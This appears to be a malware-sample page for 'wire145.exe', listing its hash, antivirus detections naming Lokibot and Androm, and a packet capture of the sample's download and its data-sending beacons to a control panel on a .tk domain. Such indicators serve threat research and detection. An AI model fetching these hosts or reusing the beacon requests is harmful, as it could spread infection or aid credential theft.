Download Attachments
-
1
wire
Date added: May 15, 2017 2:59 am
Added by: admin
File size: 1,003 KB
Downloads: 269
SHA256: |
6c99dd395a98d20237d05527e84ef8d0d2f9f2a599494ee0632c7bfab2399e33 |
File name: |
wire145.exe |
Detection ratio: |
37 / 61 |
Analysis date: |
2017-05-15 02:54:56 UTC ( 0 minutes ago ) |
Kaspersky |
Backdoor.Win32.Androm.ngwk |
20170515 |
McAfee |
Artemis!F65BE5A2E77C |
20170515 |
McAfee-GW-Edition |
BehavesLike.Win32.Virus.th |
20170514 |
eScan |
Trojan.GenericKD.5065116 |
20170515 |
NANO-Antivirus |
Trojan.Win32.Androm.eotpjr |
20170514 |
Palo Alto Networks (Known Signatures) |
generic.ml |
20170515 |
Panda |
Trj/GdSda.A |
20170514 |
Qihoo-360 |
Trojan.Generic |
20170515 |
Rising |
Malware.Generic.3!tfe (cloud:DiQytucAL2U) |
20170515 |
Sophos |
Mal/Generic-S |
20170514 |
Symantec |
Infostealer.Lokibot |
20170514 |
Tencent |
Win32.Trojan.Inject.Auto |
20170515 |
TrendMicro-HouseCall |
Suspicious_GEN.F47V0513 |
20170515 |
VIPRE |
Trojan.Win32.Generic!BT |
20170515 |
Webroot |
W32.Trojan.Gen |
20170515 |
ZoneAlarm by Check Point |
Backdoor.Win32.Androm.ngwk |
20170514 |
2017-05-14 21:26:44.615814 IP 192.168.1.102.58035 > 176.62.8.9.80: Flags [P.], seq 0:394, ack 1, win 256, length 394: HTTP: GET /wire145.exe HTTP/1.1
E…Z.@…$ …f.>. …P…\i.0UP….c..GET /wire145.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: lamela.hr
Connection: Keep-Alive
2017-05-14 21:27:25.906564 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…{.@……..f*p…..PV.. M…P…k…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 208
Connection: close
2017-05-14 21:27:26.191163 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 246:454, ack 1, win 256, length 208: HTTP
E…{.@……..f*p…..PV…M…P…S…..’…….ckav.ru..
…u.s.e.r.n.a.m.e.1.3.4…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…………………k……………..0…3.D.F.D.8.1.C.0.7.0.8.A.4.B.C.A.3.3.3.5.F.6.4.B…..dRbP1….
2017-05-14 21:28:04.178218 IP 192.168.1.102.58043 > 8.254.247.46.80: Flags [P.], seq 345:518, ack 24469, win 256, length 173: HTTP: HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
E…&.@….R…f…….P..O…..P…….HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent
Host: download.windowsupdate.com
2017-05-14 21:30:57.454058 IP 192.168.1.102.58053 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…|.@……..f*p…..P”.z.p.PnP…-…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 181
Connection: close
Please follow and like us: